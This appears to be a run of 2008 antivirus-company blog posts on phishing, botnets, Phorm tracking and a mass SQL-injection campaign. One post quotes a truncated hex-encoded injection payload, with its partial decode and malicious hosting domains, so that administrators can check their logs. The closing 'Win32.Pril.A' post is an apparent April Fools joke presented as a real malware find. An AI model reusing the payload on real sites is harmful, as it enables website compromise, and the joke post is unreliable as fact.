Internet Security 2009 Beta was released on April 28th.
IS 2009 contains many new features including DeepGuard 2.0 and new engine technologies.
There's been a great deal of work put into our back-end systems that will directly impact the effectiveness of IS 2009. We're looking forward to its potential here in the lab.
The readership of this blog has been a very useful resource to the Internet Security project team in the past. They welcome you to try out 2009 and to provide feedback. Those that provide excellent feedback will be entered into a drawing. The team is still determining the prizes (it's budgeting time) but will probably come up with a couple of cool iPods and some free twelve-month licenses.
You can read the current release notes and sign up for the download from our Technology Preview pages.
And while on the topic of new technologies… if you don't have a machine to test our new beta, you can still try some of the technologies that will be included in Internet Security 2009.
Our Online Scanner 3.3.0 was released with a new mix of technologies.
It's *free* to use (requires Internet Explorer). Custom Scan options are possible. You can scan your entire system or a single folder.
Try Online Scanner from our support pages. If you're curious about some of changes made, check out the details in the scan report.
There was a "cyberwar" in Estonia one year ago. Civil unrest, protests, and rioting culminated in DDoS attacks against Estonian government websites. What started on the streets moved online with those that couldn't be physically present taking part in DDoS attacks that lasted for more than a week.
We blogged about the attacks here (April 28th), here (April 30th), and here (May 9th).
There were plenty of DDoS tools distributed during the attacks:
The anniversary of the riots haven't generated any activity as of yet and we don't expect anything significant later.
More recent failed examples appear to indicate that a good deal of offline heat is required before online attacks catch fire.
Some phishing gangs have a new technique. They're using trojan-spy applications.
Last week we received the following e-mail message:
Notice that the message doesn't mention anything about providing an account-name or password.
Instead, it attempts to convince the recipient that they need to install a Digital Certificate for enhanced safety. (Anybody want to buy a bridge?)
The message links to a site with the following:
It's basically a page full of jargon designed to overwhelm the potential victim. What happens if the victim falls for the bait and installs the "certificate"? A trojan-spy will be installed.
So now the phishers don't need to ask for passwords anymore, they can just take them.
This technique keeps the classic element of phishing by mimicking the trusted institution — the bank. What they've adjusted is the part that people have become skeptical of, which is giving away their password when requested by e-mail.
There's another round of mass SQL injections going on which has infected hundreds of thousands of websites.
Performing a Google search results in over 510,000 modified pages.
As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.
Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code): DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300 4C00410052004500200040005400200076006100720063006800610072 00280032003500350029002C0040004300200076006100720063006800 610072002800320035003500290020004400450043004C004100520045 0020005400610062006C0065005F0043007500720073006F0072002000 43005500520053004F005200200046004F0052002000730065006C0065 0063007400200061002E006E0061006D0065002C0062002E006E006100 6D0065002000660072006F006D0020007300790073006F0062006A0065 00630074007300200061002C0073007900730063006F006C0075006D00 6E00730020006200200077006800650072006500200061002E00690064 003D0062002E0069006400200061006E006400200061002E0078007400 7900700065003D00270075002700200061006E0064002000280062002E 00780074007900700065003D003900390020006F007200200062002E00 780074007900700065003D003300350020006…
Which when decoded becomes: DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b…
So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them.
So what should you do?
First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected. Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there. Third, block access to the sites above. Fourth, make sure the software you use is patched, F-Secure Health Check is an easy way to do this. Fifth, keep your antivirus solution up-to-date.
UPDATE: We've received some questions on the platform and operating systems affected by this attack. So far we've only seen websites using Microsoft IIS Web Server and Microsoft SQL Server being hit. Do note that this attack doesn't use vulnerabilities in any of those two applications. What makes this attack possible is poorly written ASP and ASPX (.net) code.
The best beta testers will receive a free twelve-month subscription. So if you have Windows Home Server, come give it a try.
Your feedback is invaluable. Cheers!
P.S. The Technology Preview Program currently has two other options including the March 31st release of Health Check. Reader feedback has been very useful there so please check it out if you haven't already.
On Monday SANS Internet Storm Center wrote about a targeted attack against CEOs. The e-mail messages were directly sent to senior corporate executives and properly identified them by name. The message claimed their testimony was required in a corporate lawsuit. If they clicked through on the link to read the supposed subpoena they were then asked to install a file.
And if they ran the file? Then they were really installing a trojan-spy designed to steal certificates. Here's the description of what we detect as Trojan-Spy:W32/Small.BSL.
Ero Carrera, Zynamics GmbH: Day one with "Malware — Behavior, Tools, Scripting and Advanced Analysis" presented a Python extension for Bochs, an open source CPU emulator that can be found at bochs.sourceforge.net. According to Ero, some malware such as Storm usually make a call to some ancient APIs. It uses the return values as part of its decryption routine, which cannot be reproduced by sand-boxing and therefore doesn't end up in the decryption part of the malware. Using a full emulator such as Bochs, can bypass most of the anti-vmware tricks.
Jim Geovedi: "Hijacking VSAT Connections" was an update on a previous HITB presentation called "Hacking a Bird in The Sky: Hijacking VSAT Connections". Jim presented ways to defeat detections from local government agencies and also added that this hijacking can also be done via MACs, not only IPs.
Dino Covotsos from Telspace Systems practically showed various method of exploiting Bluetooth technology with some freely available tools. Imagine an attacker that can read and send SMS and make some premium phone calls without your knowledge. He even mentioned F-Secure a few times in his presentation, "Hacking the Bluetooth Stack for Fun, Fame and Mayhem".
With Bruce Schneier, as keynote speaker on day one tackling the feeling of security and Jeremiah Grossman on day two with some nice yet scary statistics on website hacks; this has been a great two-day Security Conference here in Dubai.
Timo Hirvonen's Bachelor of Science thesis from the Tampere University of Technology: Antireversing Techniques Full disclosure: Timo's reverse engineering examples in the thesis include three infamous Assembly Khallenge programs written by Kamil from our lab.
Then the bad news; only the summaries of these documents are in English. Sorry.
And while we're still on the topic: I'll be giving a lecture at Cambridge University next week. Hey, that's going to look nice on my bio.
We've been running a course at the Helsinki University of Technology covering malware analysis and antivirus technologies (we blogged about this earlier this year).
We've had many lecturers from our Security Lab giving talks on various topics during the spring. Here's Mika Ståhlberg talking about antivirus engines:
As soon as we announced that we were running such a unique course, we received lots of questions about the material. So now we're happy to announce that all the course material from the lectures are publicly available from the course webpage.
Now the course is coming to a close. The students are currently working on their final project: designing and implementing an antivirus engine. While this sounds like a daunting task (it takes a lot of time to develop a good engine), we are keeping things reasonable. The main focus is on coming up with a sound design and implementing a basic engine to test it out.
Our students have been very successful in different homework assignments such as reverse engineering puzzles, manual disassembly, emulators, and tackling anti-debugging tricks, so we're sure they'll do an excellent job with their projects as well. You can try your own skills on the homework assignments here. Do note that all the test samples available for download are harmless.
We wish good luck to all the students with their final projects!
For some time now, several ISPs in UK have been lobbied by an advertising company called Phorm. The online advertising business generates a great deal of revenue and so it's easy to listen to riches and fortune when opportunity knocks. But is the potential opportunity worth the potential risk to privacy?
Phorm's technology is a tracking solution for ISPs that would enable the display of contextual advertisements. When ISP subscribers browse the web, their content will be "deep packet" scanned to gather information about their interests. Advertisement banners will then be selected based on those interests.
The effect is similar to most adware solutions today — except it's installed on your ISP instead of your home computer.
During the summer of 2007 a large UK ISP did a trial of Phorm's technology. Thousands of customers' browsing habits were monitored. Whether the information was used, stored or shared with Phorm is unclear. Currently no ISP has this technology in use, but several in UK have signed up as partners with Phorm.
Because the technology uses a cookie to identity each user, most antivirus vendors have the possibility of creating a signature and can wipe the tracks of monitored interests. Based on the descriptions of the deployment (opt-out) and the technology we lean towards creating such a detection signature for the cookie. The same stance has been given by many other security vendors and we all pull for a secure opt-in solution.
It has also come to our attention that Phorm was previously known as 121Media.
121Media was the company behind the brand PeopleOnPage. PeopleOnPage is the friendly wrapper around the advertisement engine ContextPlus. Another wrapper was called Apropos, which was one of the most widespread malicious rootkits of 2005. In 2006 the heat was too much and they shut it down. DNS registrars and website content supported that they were all in it together.
Using multiple brands and not having full disclosure is common in the adware business. Renaming a company to clear a bad reputation has also been seen before.
In the media war against Phorm, they always come back to their extreme measures not to include personal or privacy sensitive data. Even if they have good measurements for this today — it doesn't mean it won't change tomorrow. Ernst and Young scrutinized their technology earlier and now 80/20 Thinking is also giving it a review — but who will look into their future upgrades after they've already sold it to the ISPs?
For our London based readers, there is a public event this evening (Tuesday) where you can ask Kent Ertugrul about Apropos and ContextPlus.
How many users did ContextPlus had? If Apropos is installed on my home computer, from where can I get assistance on how to uninstall it? What was the intension of the rootkit/stealth technology in Apropos? Why should we trust Phorm?
There's recently been quite much fuss about a botnet of spam trojans dubbed Kraken.
There've been some claims that the botnet is the biggest currently out there, massing over 400,000 infected computers. Most vendors in the industry have been wondering about the numbers, which seem to be a bit bloated when taking a look at received samples.
Yesterday, Brian Krebs of Security Fixrevealed that Damballa, the initial breaker of the Kraken story, has hijacked some of Kraken's domain names and are using the hijacked DNS resource records to count infections.
After a little bit of digging, we found one of the hostnames that Kraken uses: [censored].1dumb.com. It currently resolves to an IP address owned by the Georgia Institute of Technology, which is where Damballa resides.
We first saw earlier variants of this particular malware around the summer of 2006, so it's not exactly breaking news. It's possible that the statistics collected from this DNS trap include old, now dysfunctional variants and thus bloating the amount of "new" Kraken infections.
There are many detection names for "Kraken"; Oderoor, Bobax, Agent, and many more. We believe that there is a single group of people behind Karken, updating their malware as time goes by. It's not new, it's just a new generation of something older. The latest variant is detected as: Trojan.Win32.Obfuscated.GY.
Updated to Add: Those interested in reading Damballa's point of view will find a link in this post's comments.
It's the second Tuesday of the month again and — it's once again time for scheduled updates from Microsoft.
There are five critical and three important updates this month.
The vulnerabilities released by Microsoft for April's Patch Tuesday are:
— Microsoft Windows Kernel Privilege Escalation Vulnerability — Microsoft Windows hxvz.dll ActiveX Control Memory Corruption — Microsoft Windows GDI Image Parsing Buffer Overflows — Microsoft Windows DNS Client Predictable Transaction ID Vulnerability — Microsoft Visio Two File Processing Vulnerabilities — Microsoft Project Unspecified Code Execution Vulnerability — Internet Explorer Data Stream Handling Vulnerability and — Microsoft VBScript/JScript Script Decoding Buffer Overflow
Malicious software and frauds are very closely related. Malware research frequently leads to our discovering new ways with which to scam victims. So we're often reading up on the topic…
The USA's Internet Crime Complaint Center (IC3) is a partnership between the FBI and the National White Collar Crime Center (NW3C). Last week the IC3 released its Annual Report for 2007. You can download a copy from here.
The report is fairly interesting reading. Besides the statistics based on its casework, the report also details a number of popular scams such as: Pet Scams Secret Shopper and Funds Transfer Scams Adoption Fraud (Charity Fraud) Romance Fraud
The Scam Synopsis also refers to a site called Looks Too Good To Be True that may be of interest to weblog readers. "Looks Too Good" details current scams and provides FAQs and Tips.
Storm has once again turned its eye to the blogging community, specifically the Blogspot.com community.
Several blogger sites with random or very quirky names have been sporting a love theme, Storm style. These sites appear to have been created solely for Storm's purposes and no legitimate blogger site has of yet been reported as infected.
Visiting these sites will lead you to another page, while keeping the Blogger menu at the top.
Clicking the site's image downloads a file called love.exe while clicking the link will provide withlove.exe.
All files are detected as Email-Worm.Win32.Zhelatin.WW since database update 2008-04-06_02.
For security reasons we have sent the message as an attachment file. This measure has been adopted to prevent personal information theft and data loss.
------------------------------------------------- ож Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions. Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH. None of the information contained in this website constitutes, nor should be construed as Financial Advice. Internal complaint handling procedures can be requested by contacting our Customer Service Department.
The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:
When looking at the source code, we can see that the HTML file loads all the components from moneybookers.com — the real site… but the Form POST function looks funky:
form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left"
Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address.
Lets see where this goes.
But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:
The commission has been informed that they've been hacked.
There's been a banking trojan spam run in four European countries this morning. The targeted countries are The Netherlands, Switzerland, Latvia, and Finland.
The e-mails claim to be from a Russian student girl looking for a local sex partner — or failing that, just a friend. The mail urges the recipient to check her photos on a site called livejournalhelper.cn (in China).
Unfortunately, the site only has thumbnails of Ms. Polinka's pictures; if you try to view the larger images you're prompted by an error message of a missing plug-in that you supposedly need. The plug-in of course is the malware itself — a manual man-in-the-middle banking trojan.
Here's what the sites look like in different languages:
This malware is very closely related to the so called "Mikkeli" case, found in February.
We've seen tons of banking trojans lately, but now we've run into something quite unique.
This new banking trojan was found today from a drive-by-download site. We've added detection for it as Win32.Pril.A.
It not only infects the MBR of the machine, but also re-flashes the boot code in the Flash BIOS, making disinfection problematic.
Once an infected machine is online, the trojan monitors the user's actions, waiting him to go to go to one of several hundred online banks, located all over the world.
Once the user has logged on, the banking trojan uses PCMCIA to inject code into the VGA! As an end result, the trojan creates a man-in-the-browser attack against the victim.
Now, the really surprising part is what the trojan does. Normal banking trojans would insert extra transactions or change the deposit account numbers on-the-fly. However, Win32.Pril.A doesn't withdraw money from you — it actually inserts money TO your account. This looked so weird we had to test it several times, on all of our accounts.
The drive-by-download site is still up. Normally, we wouldn't list the URL for such a site, or we would at least obfuscate it in a screenshot. However this time we'll make an exception. We will even make the link clickable: http://aprilbanking.cjb.net/.